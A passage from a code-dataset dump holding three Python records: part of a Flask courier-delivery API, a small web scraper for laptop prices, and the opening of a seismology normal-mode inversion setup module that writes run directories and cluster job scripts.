list(map(lambda x: int(x * 100), ords))\n c = list(map(lambda x: int(x * 100), ords))\n dp = [[(0, [])] + [(-1, [])] * w for i in range(n)]\n dp[0][0] = (0, [])\n dp[0][a[0]] = (c[0], [1])\n for i in range(1, n):\n for j in range(1, w + 1):\n dp[i][j] = dp[i - 1][j]\n if j - a[i] >= 0 and dp[i - 1][j - a[i]][0] != - 1:\n if dp[i][j][0] < dp[i - 1][j - a[i]][0] + c[i]:\n dp[i][j] = (dp[i - 1][j - a[i]][0] + c[i], dp[i - 1][j - a[i]][1] + [i + 1])\n ans = max(dp[-1])[1]\n return list(map(lambda x: x - 1, ans))\n except IndexError:\n return []\n\n\n@blueprint.route('/couriers', methods=[\"POST\"])\ndef add_couriers():\n req_json = request.json['data']\n db_sess = db_session.create_session()\n res = []\n bad_id = []\n already_in_base = [i.id for i in db_sess.query(Courier).all()]\n is_ok = True\n for courier_info in req_json:\n flag = False\n error_ans = []\n try:\n CourierModel(**courier_info, base=already_in_base)\n except pydantic.ValidationError as e:\n error_ans += json.loads(e.json())\n flag = True\n if courier_info['courier_id'] in already_in_base:\n error_ans += [\n {\"loc\": [\"id\"], \"msg\": \"Invalid id: There is a courier with the same id\", \"type\": \"value_error\"}\n ]\n if flag or courier_info['courier_id'] in already_in_base:\n is_ok = False\n bad_id.append({\"id\": int(courier_info['courier_id']), 'errors': error_ans})\n if not is_ok:\n continue\n courier = Courier()\n courier.id = courier_info['courier_id']\n courier.maxw = c_type[courier_info['courier_type']]\n for i in list((courier_info['regions'])):\n reg = Region()\n reg.courier_id = courier.id\n reg.region = i\n db_sess.add(reg)\n for i in list(courier_info['working_hours']):\n wh = WH()\n wh.courier_id = courier.id\n wh.hours = i\n db_sess.add(wh)\n db_sess.add(courier)\n res.append({\"id\": courier_info['courier_id']})\n\n if is_ok:\n db_sess.commit()\n return jsonify({\"couriers\": res}), 201\n pprint({\"validation_error\": bad_id})\n print('-------------------------------------------------------------------------')\n return jsonify({\"validation_error\": bad_id}), 400\n\n\n@blueprint.route('/orders', methods=[\"POST\"])\ndef add_orders():\n req_json = request.json['data']\n db_sess = db_session.create_session()\n res = []\n bad_id = []\n is_ok = True\n already_in_base = [i.id for i in db_sess.query(Order).all()]\n for order_info in req_json:\n flag = False\n error_ans = []\n try:\n OrderModel(**order_info, base=already_in_base)\n except pydantic.ValidationError as 
e:\n error_ans += json.loads(e.json())\n flag = True\n if order_info['order_id'] in already_in_base:\n error_ans += [\n {\"loc\": [\"id\"], \"msg\": \"Invalid id: There is a order with the same id\", \"type\": \"value_error\"}\n ]\n if flag or order_info['order_id'] in already_in_base:\n is_ok = False\n bad_id.append({\"id\": int(order_info['order_id']), 'errors': error_ans})\n if not is_ok:\n continue\n order = Order()\n order.id = order_info['order_id']\n order.weight = order_info['weight']\n order.region = order_info['region']\n order.orders_courier = 0\n for i in list(order_info['delivery_hours']):\n dh = DH()\n dh.order_id = order.id\n dh.hours = i\n db_sess.add(dh)\n db_sess.add(order)\n res.append({\"id\": int(order_info['order_id'])})\n\n if is_ok:\n db_sess.commit()\n return jsonify({\"orders\": res}), 201\n pprint({\"validation_error\": bad_id})\n print('-------------------------------------------------------------------------')\n return jsonify({\"validation_error\": bad_id}), 400\n\n\n@blueprint.route('/couriers/', methods=[\"PATCH\", \"GET\"])\ndef edit_courier(courier_id):\n db_sess = db_session.create_session()\n courier = db_sess.query(Courier).filter(Courier.id == courier_id).first()\n if not courier:\n return jsonify({'message': 'no courier with this id'}), 404\n if request.method == 'PATCH':\n req_json = request.json\n try:\n EditCourierModel(**req_json)\n except pydantic.ValidationError as e:\n print({'errors': json.loads(e.json())})\n return jsonify({'errors': json.loads(e.json())}), 400\n for k, v in dict(req_json).items():\n if k == 'courier_type':\n courier.maxw = c_type[v]\n elif k == 'regions':\n db_sess.query(Region).filter(Region.courier_id == courier.id).delete()\n for i in v:\n reg = Region()\n reg.courier_id = courier.id\n reg.region = i\n db_sess.add(reg)\n elif k == 'working_hours':\n db_sess.query(WH).filter(WH.courier_id == courier.id).delete()\n for i in v:\n wh = WH()\n wh.courier_id = courier.id\n wh.hours = i\n db_sess.add(wh)\n db_sess.commit()\n res = {'courier_id': courier_id, 'courier_type': rev_c_type[courier.maxw]}\n a = db_sess.query(WH).filter(WH.courier_id == courier.id).all()\n res['working_hours'] = [i.hours for i in a]\n b = [i.region for i in db_sess.query(Region).filter(Region.courier_id == courier.id).all()]\n res['regions'] = b\n for i in db_sess.query(Order).filter(Order.orders_courier == courier_id).all():\n dh = db_sess.query(DH).filter(DH.order_id == i.id).all()\n if i.complete_time:\n continue\n if i.region not in res['regions'] or not is_t_ok(dh, a):\n i.orders_courier = 0\n db_sess.commit()\n ords = list(db_sess.query(Order).filter(Order.orders_courier == courier_id, Order.complete_time == '').all())\n for i in ords:\n i.orders_courier = 0\n db_sess.commit()\n courier.currentw = 0\n inds = choose_orders(list(map(lambda u: u.weight, ords)), courier.maxw)\n for i in inds:\n order = ords[i]\n courier.currentw += order.weight\n order.orders_courier = courier_id\n db_sess.commit()\n return jsonify(res), 200\n elif request.method == 'GET':\n res = {'courier_id': courier_id, 'courier_type': rev_c_type[courier.maxw]}\n a = [i.hours for i in db_sess.query(WH).filter(WH.courier_id == courier.id).all()]\n res['working_hours'] = a\n b = [i.region for i in db_sess.query(Region).filter(Region.courier_id == courier.id).all()]\n res['regions'] = b\n if not db_sess.query(Order).filter(Order.orders_courier == courier_id,\n Order.complete_time == '').all():\n courier.earnings += courier.last_pack_cost\n courier.last_pack_cost = 0\n res['earnings'] 
= courier.earnings\n if not courier.earnings:\n return jsonify(res), 200\n try:\n t = min([i.summa / i.q\n for i in db_sess.query(Region).filter(Region.courier_id == courier.id).all() if i.q != 0])\n except ValueError:\n t = 60 * 60\n res['rating'] = round((60 * 60 - min(t, 60 * 60)) / (60 * 60) * 5, 2)\n return jsonify(res), 200\n\n\n@blueprint.route('/orders/assign', methods=[\"POST\"])\ndef assign_orders():\n courier_id = request.json['courier_id']\n db_sess = db_session.create_session()\n courier = db_sess.query(Courier).filter(Courier.id == courier_id).first()\n if not courier:\n return jsonify({'message': 'no courier with this id'}), 400\n ords = db_sess.query(Order).filter(Order.orders_courier == courier_id, Order.complete_time == '').all()\n if ords:\n # print('didnt all task')\n res = [{'id': i.id} for i in ords]\n return jsonify({'orders': res, 'assign_time': courier.last_assign_time}), 201\n courier_regions = [i.region for i in db_sess.query(Region).filter(Region.courier_id == courier_id).all()]\n courier_wh = db_sess.query(WH).filter(WH.courier_id == courier_id).all()\n ords = db_sess.query(Order).filter((Order.orders_courier == 0), Order.region.in_(courier_regions)).all()\n ords = list(filter(lambda u: is_t_ok(db_sess.query(DH).filter(DH.order_id == u.id).all(), courier_wh), ords))\n inds = choose_orders(list(map(lambda u: u.weight, ords)), courier.maxw)\n for i in inds:\n order = ords[i]\n courier.currentw += order.weight\n order.orders_courier = courier_id\n\n db_sess.commit()\n\n res = [{'id': order.id} for order in\n db_sess.query(Order).filter(Order.orders_courier == courier_id, '' == Order.complete_time)]\n if not res:\n return jsonify({\"orders\": []}), 200\n courier.last_pack_cost = kd[courier.maxw] * 500\n # t = str(datetime.datetime.utcnow()).replace(' ', 'T') + 'Z'\n t = str(datetime.datetime.utcnow().isoformat()) + 'Z'\n courier.last_assign_time = t\n assign_time = t\n if '' == courier.last_delivery_t:\n courier.last_delivery_t = assign_time\n db_sess.commit()\n return jsonify({\"orders\": res, 'assign_time': str(assign_time)}), 200\n\n\n@blueprint.route('/orders/complete', methods=[\"POST\"])\ndef complete_orders():\n req_json = request.json\n db_sess = db_session.create_session()\n courier_id = req_json['courier_id']\n order_id = req_json['order_id']\n complete_t = req_json['complete_time']\n courier = db_sess.query(Courier).filter(Courier.id == courier_id).first()\n order = db_sess.query(Order).filter(Order.id == order_id).first()\n if not courier:\n return jsonify({'message': 'no courier with this id'}), 400\n if not order:\n return jsonify({'message': 'no order with this id'}), 400\n if order.orders_courier != courier.id:\n return jsonify({'message': 'courier and order don\\'t match'}), 400\n db_sess.commit()\n reg = db_sess.query(Region).filter(\n Region.region == order.region, Region.courier_id == courier_id\n ).first()\n reg.q += 1\n u = datetime.datetime.fromisoformat(complete_t.split('.')[0])\n v = datetime.datetime.fromisoformat(courier.last_delivery_t.split('.')[0])\n courier.last_delivery_t = complete_t\n reg.summa += (u - v).total_seconds()\n if order.complete_time == '':\n courier.currentw -= order.weight\n order.complete_time = complete_t\n if not db_sess.query(Order).filter(Order.orders_courier == courier_id,\n Order.complete_time == '').all():\n courier.earnings += courier.last_pack_cost\n courier.last_pack_cost = 0\n db_sess.commit()\n return jsonify({'order_id': order.id}), 200\n\n\n@blueprint.route('/test', methods=['GET'])\ndef test():\n 
return jsonify({\"test\": 'connection is here'}), 201\n\n\n@blueprint.route('/clear', methods=['POST'])\ndef clear():\n if request.json['code'] != CODE:\n return jsonify({\"error\": \"wrong code\"}), 400\n db_sess = db_session.create_session()\n db_sess.query(Courier).delete()\n db_sess.query(Order).delete()\n db_sess.query(Region).delete()\n db_sess.query(WH).delete()\n db_sess.query(DH).delete()\n db_sess.commit()\n return jsonify({'status': 'all data cleared'}), 201\n","sub_path":"data/shop_api.py","file_name":"shop_api.py","file_ext":"py","file_size_in_byte":17243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"74372753","text":"from bs4 import BeautifulSoup\nimport requests\n\ndef save():\n with open('sulpakparse.txt', 'a') as file:\n file.writelines(f\"Naming : {comp['title']}, Price : {comp['price']}, Link : {comp['link']}\\n\")\n\ndef parse():\n URL = 'https://www.sulpak.kg/f/noutbuki'\n HEADERS = {\n 'Accept' : 'ext/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36'}\n\n response = requests.get(URL, headers = HEADERS, verify=False)\n soup = BeautifulSoup(response.content, 'html.parser')\n items = soup.findAll('div', class_= 'goods-tiles')\n comps = []\n\n for i in items:\n try:\n comps.append({\n 'title' : i.find('h3', class_ = 'title').get_text(strip=True),\n 'price' : i.find('div', class_ = 'price').get_text(strip=True),\n 'link' : URL + i.find('div', class_ = 'product-container-right-side').find('a').get('href'),\n })\n except:\n pass\n global comp\n for comp in comps:\n print (f\"Naming : {comp['title']}, Price : {comp['price']}, Link : {comp['link']}\\n\")\n save()\n\n\nparse()","sub_path":"sulpaklaptop.py","file_name":"sulpaklaptop.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"185413831","text":"import os\nfrom os.path import exists, join, splitext\nimport shutil\nfrom shutil import copy as cp\nimport subprocess\nimport numpy as np\nfrom obspy.core import AttribDict\n\nfrom frospy.core.modes import read as read_modes\nfrom frospy.core.modes import format_name\nfrom frospy.core.segment import read as read_seg\n\nimport frospy.standalone_tools as pypath\n\n\ninvoutpath = join(pypath.__path__[0], 'write_inversion_out.py')\nif invoutpath.startswith('/net'):\n invoutpath = 'nmpy/standalone_tools/write_inversion_out.py'\n\nmergepath = join(pypath.__path__[0], 'merge.py')\nif mergepath.startswith('/net'):\n mergepath = 'nmpy/standalone_tools/merge.py'\n\nforkpath = join(pypath.__path__[0], 'read_event_loop.pl')\nif forkpath.startswith('/net'):\n forkpath = 'nmpy/standalone_tools/read_event_loop.pl'\n\n\ndef rundir(setup, remove_existing, update_only=False):\n \"\"\"\n Creates the run directory as specifed in setup.rundir\n \"\"\"\n if not update_only:\n if exists(setup.rundir):\n if remove_existing is True:\n shutil.rmtree(setup.rundir)\n else:\n raise IOError('rundir exists!')\n os.makedirs(setup.rundir)\n\n # If inversion_out is default, then it is within rundir\n if setup.inversion_outdir == 'inversion_out':\n os.makedirs(join(setup.rundir, setup.inversion_outdir))\n else:\n os.makedirs(setup.inversion_outdir)\n\n # Copy write_inversion_out.py to folder\n src = [join(setup.nmpydir, invoutpath),\n join(setup.nmpydir, 
mergepath),\n join(setup.nmpydir, forkpath)]\n dst = [join(setup.rundir, \"write_inversion_out.py\"),\n join(setup.rundir, \"merge.py\"),\n join(setup.rundir, \"read_event_loop.pl\")]\n\n for s, d in zip(src, dst):\n shutil.copy(s, d)\n\n return\n\n\ndef arraydirs(setup, remove_existing):\n \"\"\"\n Creates a directory for every event specifed in setup.segmentsdir\n with the modes.in and segment file\n \"\"\"\n if (\n isinstance(setup.segmentsdir, AttribDict) or\n isinstance(setup.segmentsdir, dict)\n ):\n nof_sets = len(setup.segmentsdir)\n if setup.intype == 'CST':\n fname = os.path.join(setup.rundir, 'allevents')\n\n with open(fname, 'w+') as fh:\n for segname, sdir in setup.segmentsdir.items():\n events = sorted(setup.events[segname])\n\n for event in events:\n if nof_sets > 1:\n\n segdir = os.path.join(setup.rundir, segname)\n if not exists(segdir):\n os.makedirs(segdir)\n eventdir = os.path.join(setup.rundir, segname,\n event)\n\n else:\n eventdir = os.path.join(setup.rundir, event)\n\n if exists(eventdir):\n if remove_existing is True:\n shutil.rmtree(eventdir)\n else:\n raise IOError('eventdir exists!')\n os.makedirs(eventdir)\n # write allevents\n if nof_sets > 1:\n fh.write('%s %s\\n' % (segname, event))\n else:\n fh.write('%s\\n' % event)\n\n # copying modesin\n modesfile = modesin(setup, filename='modes.in')\n cp(modesfile, eventdir)\n\n # copying segments from rundir to each eventdir\n src_all, dst_all = segments(setup, print_seg=False)\n for src, dst in zip(src_all, dst_all):\n dst = splitext(dst)[0]\n cp(src, dst)\n\n elif setup.intype == 'FSI':\n fname = os.path.join(setup.rundir, 'allevents')\n with open(fname, 'w+') as fh:\n for segname, sdir in setup.segmentsdir.items():\n events = sorted(setup.events[segname])\n for event in events:\n eventdir = os.path.join(sdir, event)\n if exists(eventdir):\n if remove_existing is True:\n shutil.rmtree(eventdir)\n else:\n raise IOError('eventdir exists!')\n os.makedirs(eventdir)\n # write allevents\n fh.write('%s %s\\n' % (segname, event))\n\n # copying modesin\n modesfile = os.path.join(sdir, 'modes.in')\n modessfile = os.path.join(sdir, 'modess.in')\n modesmfile = os.path.join(sdir, 'modesm.in')\n segfile = os.path.join(sdir, '%s.dat' % (event))\n cp(modesfile, eventdir)\n cp(modessfile, eventdir)\n cp(modesmfile, eventdir+'/modes.in')\n cp(segfile, eventdir)\n\n elif os.path.isdir(setup.segmentsdir):\n fname = os.path.join(setup.rundir, 'allevents')\n events = sorted(setup.events)\n with open(fname, 'w+') as fh:\n for event in events:\n eventdir = os.path.join(setup.rundir, event)\n if exists(eventdir):\n if remove_existing is True:\n shutil.rmtree(eventdir)\n else:\n raise IOError('eventdir exists!')\n os.makedirs(eventdir)\n fh.write('%s\\n' % event) # write allevents\n\n # copying modesin\n modesfile = modesin(setup, filename='modes.in')\n cp(modesfile, eventdir)\n\n # copying segments from rundir to each eventdir\n src_all, dst_all = segments(setup, print_seg=False)\n for src, dst in zip(src_all, dst_all):\n dst = splitext(dst)[0]\n cp(src, dst)\n\n return\n\n\ndef modesin(setup, filename='modes.in'):\n \"\"\"\n Writes modes.in file needed for mdcplmrho* programs\n \"\"\"\n path = setup.rundir\n fname = os.path.join(path, filename)\n with open(fname, 'w+') as fh:\n fh.write('%s\\n' % len(setup.modes_sc))\n for mode, smax in setup.modes_sc.items():\n m = read_modes(modenames=mode)[0]\n fh.write(\"%03d %s %03d\\n\" % (m.n, m.type.lower(), m.l))\n return fname\n\n\ndef segments(setup, print_seg=True):\n \"\"\"\n Setup of segment 
files. Copies all files ending with 'suffix'\n from setup.segmentsdir to setup.rundir .\n \"\"\"\n dst_all = []\n src_all = []\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch')\n ):\n default = '/quanta1/home/simons/splitting/alldatafiles'\n elif setup.rundir.startswith('/nfs'):\n default = '//nfs/stig/deuss/modes/alldatafiles'\n else:\n default = setup.datadir\n\n\n accepted_ftypes = ['segmentZ', 'segmentT', 'segmentR', 'dat']\n if setup.segmentsdir is None:\n return\n\n # If segmentsdir is a dict-type\n if (\n isinstance(setup.segmentsdir, AttribDict) or\n isinstance(setup.segmentsdir, dict)\n ):\n nof_sets = len(setup.segmentsdir)\n for segname, sdir in setup.segmentsdir.items():\n for seg in os.listdir(sdir):\n cmt, ftype = seg.split('.')\n if ftype not in accepted_ftypes:\n continue\n\n if \"%s.cmt\" % cmt not in os.listdir(default):\n continue\n src = join(sdir, seg)\n if nof_sets > 1:\n dst = join(setup.rundir, segname, seg)\n else:\n dst = join(setup.rundir, seg)\n dst_all.append(dst)\n src_all.append(src)\n if not exists(dst) and print_seg is True:\n try:\n cp(src, dst)\n except Exception:\n print(\"Needs array inversion setup\")\n\n # If segmentsdir is a directory\n elif os.path.isdir(setup.segmentsdir):\n for seg in os.listdir(setup.segmentsdir):\n cmt, ftype = seg.split('.')\n if ftype not in accepted_ftypes:\n continue\n\n if \"%s.cmt\" % cmt not in os.listdir(default):\n continue\n src = join(setup.segmentsdir, seg)\n dst = join(setup.rundir, seg)\n dst_all.append(dst)\n src_all.append(src)\n if not exists(dst) and print_seg is True:\n cp(src, dst)\n\n # If segmentsdir is a file\n else:\n src = join(setup.segmentsdir)\n seg = setup.segmentsdir.split('/')[-1]\n cmt, ftype = seg.split('.')\n if ftype in accepted_ftypes and print_seg is True:\n if \"%s.cmt\" % cmt in os.listdir(default):\n dst = join(setup.rundir, seg)\n dst_all.append(dst)\n src_all.append(src)\n cp(src, dst)\n\n return src_all, dst_all\n\n\ndef submission(setup):\n \"\"\"\n Submits the pbs script to stig\n \"\"\"\n pbsrundir = pbsrundir_sanity_check(setup.rundir)\n msg = \"ssh stig 'cd %s; qsub qsub_me.pbs'\" % (pbsrundir)\n p = subprocess.Popen(msg, stdout=subprocess.PIPE, shell=True)\n (output, err) = p.communicate()\n if err is not None:\n raise RuntimeError(\"Submission Failed:\\n{}\".format(output))\n\n\ndef damping_file(setup, mdamp):\n modelfile = 'Cm1.dat'\n\n if setup.intype == 'CST':\n mfile = join(setup.rundir, modelfile)\n with open(mfile, 'w+') as fh:\n for key, val in mdamp['cst'].items():\n for v in val:\n fh.write('%s\\n' % v)\n\n if len(setup.modes_sc_dst) > 0:\n for key, val in mdamp['dst'].items():\n for v in val:\n fh.write('%s\\n' % v)\n return\n\n\ndef startmodel(setup):\n \"\"\"\n Setup of startmodel.\n creates the startfiles file in setup.rundir, reading from setup.mzero\n \"\"\"\n if setup.intype == 'CST':\n modelfile = 'mzero.dat'\n\n if setup.startmodel == 'S20RTS':\n if setup.intype == 'CST': # PREM & S20RTS are the same for cst\n mfile = join(setup.rundir, modelfile)\n with open(mfile, 'w+') as fh:\n for key, val in setup.mzero[\"cst\"].items():\n for v in val:\n fh.write('%s\\n' % v)\n\n if len(setup.modes_sc_dst) > 0:\n for key, val in setup.mzero[\"dst\"].items():\n for v in val:\n fh.write('%s\\n' % v)\n # To start, mcst.dat must be there too\n cp(mfile, join(setup.rundir, 'mcst.dat'))\n setup.model = mfile\n\n elif setup.intype == 'FSI':\n if setup.s_deg == 20:\n if (\n setup.rundir.startswith('/quanta') or\n 
setup.rundir.startswith('/scratch')\n ):\n setup.model = '/quanta1/home/jagt/dta/S20RTS_MC.sph'\n else:\n setup.model = '/home/deuss/dta/S20RTS_MC.sph'\n elif setup.s_deg == 4:\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch')\n ):\n setup.model = '/quanta1/home/jagt/dta/S20RTS_l4.sph'\n else:\n setup.model = '/home/deuss/dta/S20RTS_l4.sph'\n else:\n pass\n\n elif setup.startmodel == 'PREM':\n if setup.intype == 'CST':\n mfile = join(setup.rundir, modelfile)\n with open(mfile, 'w+') as fh:\n for key, val in setup.mzero[\"cst\"].items():\n for v in val:\n fh.write('%s\\n' % v)\n if len(setup.modes_sc_dst) > 0:\n for key, val in setup.mzero[\"dst\"].items():\n for v in val:\n fh.write('%s\\n' % v)\n # To start from PREM, mcst.dat must be there too\n cp(mfile, join(setup.rundir, 'mcst.dat'))\n setup.model = mfile\n\n elif setup.intype == 'FSI':\n if setup.s_deg == 20:\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch')\n ):\n setup.model = '/quanta1/home/jagt/dta/mzero_l20.sph'\n else:\n setup.model = '/home/jagt/splitting/mzero_l20.sph'\n elif setup.s_deg == 4:\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch')\n ):\n setup.model = '/quanta1/home/jagt/dta/mzero_l4.sph'\n else:\n setup.model = '/home/jagt/splitting/mzero_l4.sph'\n else:\n pass\n else:\n if setup.intype == 'CST':\n mfile = join(setup.rundir, modelfile)\n with open(mfile, 'w+') as fh:\n for key, val in setup.mzero[\"cst\"].items():\n for v in val:\n fh.write('%s\\n' % v)\n if len(setup.modes_sc_dst) > 0:\n for key, val in setup.mzero[\"dst\"].items():\n for v in val:\n fh.write('%s\\n' % v)\n # To start from PREM, mcst.dat must be there too\n cp(mfile, join(setup.rundir, 'mcst.dat'))\n setup.model = mfile\n\n return\n\n\ndef get_damping_string(setup):\n damping = ''\n for d in setup.damping:\n damping += \"%4.2e \" % d\n return damping\n\n\ndef get_segments(seg_suffix):\n msg = ''\n msg += 'declare -a SEGMENTS='\n msg += '(`ls | egrep ^[0-9]*[A-Z].%s`)\\n' % seg_suffix\n return msg\n\n\ndef get_FILE_extension(seg_suffix):\n msg = \"${{FILE%%%%.%s}}\" % seg_suffix\n return msg\n\n\ndef dorun_preprundir(setup):\n msg = 'cp {zeromodel} .\\n'\n if setup.model.endswith('sph'):\n msg += '{sph2m} < mzero.dat\\n'\n msg += '{zeromdl}\\n'\n msg += 'EOF\\n'\n else:\n msg += 'cp {zeromodel} mzero.dat\\n'\n msg += 'cp mzero.dat mold.dat\\n'\n msg += '\\n'\n msg = msg.format(sph2m=join(setup.bindir, setup.bins.sph2m),\n zeromodel=setup.model,\n zeromdl=setup.model.split('/')[-1])\n return msg\n\n\ndef dorun_startup(setup):\n # Startmodel mzero.dat and mcst.dat are generated by create.startmodel\n msg = '#---------------------------#\\n'\n msg += '# STARTUP WITH ZERO MODEL #\\n'\n msg += '#---------------------------#\\n'\n msg += 'echo \"Starting up\" >> progress.out\\n'\n msg += 'rm inversion.dat inversion.out 2> /dev/null\\n'\n msg += 'rm dsyni.dat dsynr.dat dobsi.dat dobsr.dat mode.dat att.dat'\n msg += 'misfit.dat 2> /dev/null\\n'\n\n if setup.intype == 'CST':\n m = 'cp mzero.dat mcst.dat\\n\\n'\n m += '{rot_ellip}\\n'\n m = m.format(rot_ellip=join(setup.bindir, setup.bins.rot_ellip))\n\n if len(setup.modes_sc_dst) > 0:\n m += '{write_dst} << EOF\\n'\n for mode, smax in setup.modes_sc.items():\n m += '%s\\n' % smax\n for mode, smax in setup.modes_sc_dst.items():\n m += '%s\\n' % smax\n m += 'EOF\\n\\n'\n m = m.format(write_dst=join(setup.bindir, setup.bins.write_dst))\n\n m += '{mdcpl} << EOF\\n'\n for mode, smax in 
setup.modes_sc.items():\n # /home/deuss/bin/matrixcst\n # maximum structural deg for every mode\n m += '0 %s\\n' % smax\n if hasattr(setup, 'modes_cc'):\n # /home/deuss/bin/matrixcstC\n for mode, s in setup.modes_cc.items():\n m += '%s %s\\n' % (s[0], s[1])\n m += 'EOF\\n'\n m = m.format(mdcpl=join(setup.bindir, setup.bins.mdcpl))\n\n if len(setup.modes_sc_dst) > 0:\n m += 'mv matrix.dat matrix-cst.dat\\n\\n'\n # /home/deuss/bin/matrixdst\n m += '{mdcplmq} << EOF\\n'\n for mode, smax in setup.modes_sc_dst.items():\n # /home/deuss/bin/matrixcst\n # maximum structural deg for every mode\n m += '2 %s\\n' % smax\n m += 'EOF\\n'\n m += 'mv matrix.dat matrix-dst.dat\\n\\n'\n m += '{addmdcplmq} << EOF\\n'\n m += 'matrix-cst.dat\\n'\n m += 'matrix-dst.dat\\n'\n m += 'EOF\\n'\n m = m.format(mdcplmq=join(setup.bindir, setup.bins.mdcplmq),\n addmdcplmq=join(setup.bindir, setup.bins.addmdcplmq))\n\n elif setup.intype == 'FSI':\n m = '{mdcpl} -model {zeromodel} < 1:\n msg += 'sed -i \"/$iterno $damp $SEGDIR $EVENT/s/$/ '\n msg += 'partials/\" $PO\\n'\n else:\n msg += 'sed -i \"/$iterno $damp $EVENT/s/$/ partials/\" $PO\\n'\n msg += 'rm Ar.dat Ai.dat allevents_partials 2> /dev/null\\n'\n\n for mode, smax in setup.modes_sc.items():\n # /home/deuss/bin/compu-deriv-cst\n # maximum structural deg for every mode\n msg += 'echo %s >> allevents_partials\\n' % smax\n\n if hasattr(setup, 'modes_cc'):\n # /home/deuss/bin/compu-deriv-cstC\n for mode, s in setup.modes_cc.items():\n msg += 'echo %s %s >> allevents_partials\\n' % (s[0], s[1])\n\n msg += 'for FILE in \"${{SEGMENTS[@]}}\"\\n'\n msg += 'do\\n'\n msg += 'echo '\n msg += get_FILE_extension(list(setup.seg_suffix.values())[0])\n msg += ' >> allevents_partials\\n'\n msg += 'done\\n'\n msg += '{partial_derivatives} < allevents_partials\\n'\n msg += 'count=`grep \"NaN\" Ai.dat | wc -l`\\n'\n msg += '[ ! $count == 0 ] && echo '\n msg += '\" -NaN found in \"'\n msg += '$SEGDIR/$EVENT \" Ai.dat\" >> progress.out && rm A* && '\n msg += '{partial_derivatives} < allevents_partials\\n\\n'\n msg = msg.format(partial_derivatives=join(setup.bindir,\n setup.bins.cst_partials))\n return msg\n\n\ndef dorun_dst_partials(setup):\n msg = '#----------------#\\n'\n msg += '# Dst Partials #\\n'\n msg += '#----------------#\\n'\n if setup.intype == 'CST':\n if len(setup.events) > 1:\n msg += 'sed -i \"/$damp $SEGDIR $EVENT/s/$/ dst-partials/\" $PO\\n'\n else:\n msg += 'sed -i \"/$damp $EVENT/s/$/ dst-partials/\" $PO\\n'\n msg += 'rm allevents_partials\\n'\n\n for mode, smax in setup.modes_sc_dst.items():\n msg += 'echo %s >> allevents_partials\\n' % smax\n\n msg += 'for FILE in \"${{SEGMENTS[@]}}\"\\n'\n msg += 'do\\n'\n msg += 'echo '\n msg += get_FILE_extension(list(setup.seg_suffix.values())[0])\n msg += ' >> allevents_partials\\n'\n msg += 'done\\n'\n msg += '{partial_derivatives} < allevents_partials\\n'\n msg += 'count=`grep \"NaN\" Ai.dat | wc -l`\\n'\n msg += '[ ! 
$count == 0 ] && echo '\n msg += '\" -NaN found in \"'\n msg += '$SEGDIR/$EVENT \" Ai.dat\" >> progress.out && rm A* && '\n msg += '{partial_derivatives} < allevents_partials\\n\\n'\n msg = msg.format(partial_derivatives=join(setup.bindir,\n setup.bins.dst_partials))\n return msg\n\n\ndef dorun_cst_partials_array(setup):\n msg = '#----------------#\\n'\n msg += '# Cst Partials #\\n'\n msg += '#----------------#\\n'\n\n if setup.intype == 'CST':\n if len(setup.events) > 1:\n msg += 'sed -i \"/$iterno $damp $SEGDIR $EVENT/s/$/ '\n msg += 'partials/\" $PO\\n'\n else:\n msg += 'sed -i \"/$iterno $damp $EVENT/s/$/ partials/\" $PO\\n'\n\n msg += 'rm Ar.dat Ai.dat allevents_partials 2> /dev/null\\n'\n\n for mode, smax in setup.modes_sc.items():\n # /home/deuss/bin/compu-deriv-cst\n # maximum structural deg for every mode\n msg += 'echo %s >> allevents_partials\\n' % smax\n if hasattr(setup, 'modes_cc'):\n # /home/deuss/bin/compu-deriv-cstC\n for mode, s in setup.modes_cc.items():\n msg += 'echo %s %s >> allevents_partials\\n' % (s[0], s[1])\n\n msg += 'echo $EVENT >> allevents_partials\\n\\n'\n msg += '{partial_derivatives} < allevents_partials\\n\\n'\n msg += 'count=`grep \"NaN\" Ai.dat | wc -l`\\n'\n msg += '[ ! $count == 0 ] && echo '\n msg += '\" -NaN found in \"'\n msg += '$SEGDIR/$EVENT \" Ai.dat\" >> $MAINDIR/progress.out && rm A* && '\n msg += '{partial_derivatives} < allevents_partials\\n\\n'\n msg = msg.format(partial_derivatives=join(setup.bindir,\n setup.bins.cst_partials))\n return msg\n\n\ndef dorun_dst_partials_array(setup):\n msg = '#----------------#\\n'\n msg += '# Dst Partials #\\n'\n msg += '#----------------#\\n'\n\n if setup.intype == 'CST':\n if len(setup.events) > 1:\n msg += 'sed -i \"/$damp $SEGDIR $EVENT/s/$/ dst-partials/\" $PO\\n'\n else:\n msg += 'sed -i \"/$damp $EVENT/s/$/ dst-partials/\" $PO\\n'\n\n msg += 'rm allevents_partials\\n'\n\n for mode, smax in setup.modes_sc_dst.items():\n msg += 'echo %s >> allevents_partials\\n' % smax\n\n msg += 'echo $EVENT >> allevents_partials\\n\\n'\n msg += '{partial_derivatives} < allevents_partials\\n\\n'\n msg += 'count=`grep \"NaN\" Ai.dat | wc -l`\\n'\n msg += '[ ! $count == 0 ] && echo '\n msg += '\" -NaN found in \"'\n msg += '$SEGDIR/$EVENT \" Ai.dat\" >> $MAINDIR/progress.out && rm A* && '\n msg += '{partial_derivatives} < allevents_partials\\n\\n'\n msg = msg.format(partial_derivatives=join(setup.bindir,\n setup.bins.dst_partials))\n return msg\n\n\ndef dorun_buildATA_array(setup):\n msg = '#--------------------#\\n'\n msg += '# Build ATA matrix #\\n'\n msg += '#--------------------#\\n'\n\n msg += 'if [ ! -f $EVENT.dat ]; then\\n'\n msg += \" suffix=`ls $EVENT.segment? | cut -d'.' -f2`\\n\"\n msg += 'else\\n'\n msg += ' suffix=dat\\n'\n msg += 'fi\\n'\n\n msg += 'N_seg=`cat $EVENT.$suffix | wc -l`\\n'\n msg += 'if [ ! 
